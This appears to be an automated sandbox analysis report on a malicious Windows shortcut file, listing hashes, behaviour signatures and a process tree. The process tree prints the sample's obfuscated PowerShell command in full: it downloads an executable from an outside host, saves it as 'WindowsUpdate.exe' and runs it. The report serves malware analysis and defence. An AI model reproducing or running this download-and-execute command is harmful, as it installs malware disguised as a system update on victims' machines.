Analysis
  max time kernel: 118s
  max time network: 118s
  platform: windows7_x64
  resource: win7-20240221-en
  resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  submitted: 10/04/2024, 14:59
Static task: static1

Behavioral task: behavioral1
  Sample: f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
  Resource: win10v2004-20240226-en
General
  Target: f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
  Size: 1KB
  MD5: efcff826fa14c23c9abcd53e0a148383
  SHA1: f79f22761707f666178f8855fcfb95a46065dd21
  SHA256: f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166
  SHA512: c27f5edcd4b12500af5a7a46541bd0e6fda71bcce954e8a40138fe812adca4fb0fb46d442c3d420dfcba0937484a1ad106fb3aa94c04a2c15727d1f0a0fb45a5
Malware Config
  Extracted: http://001000100.xyz/soft/upd03212.exe
Signatures
  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid   Process
    1152  powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description               pid   Process
    Token: SeDebugPrivilege   1152  powershell.exe

  Suspicious use of WriteProcessMemory (6 IoCs)
    description                        pid   Process   procid_target
    PID 3024 wrote to memory of 2792   3024  cmd.exe   29
    PID 3024 wrote to memory of 2792   3024  cmd.exe   29
    PID 3024 wrote to memory of 2792   3024  cmd.exe   29
    PID 2792 wrote to memory of 1152   2792  cmd.exe   30
    PID 2792 wrote to memory of 1152   2792  cmd.exe   30
    PID 2792 wrote to memory of 1152   2792  cmd.exe   30
Processes (process tree, depth shown by indentation)
  [1] C:\Windows\system32\cmd.exe
      Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
      PID: 3024
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
        PID: 2792
        - Suspicious use of WriteProcessMemory

      [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
          PID: 1152
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken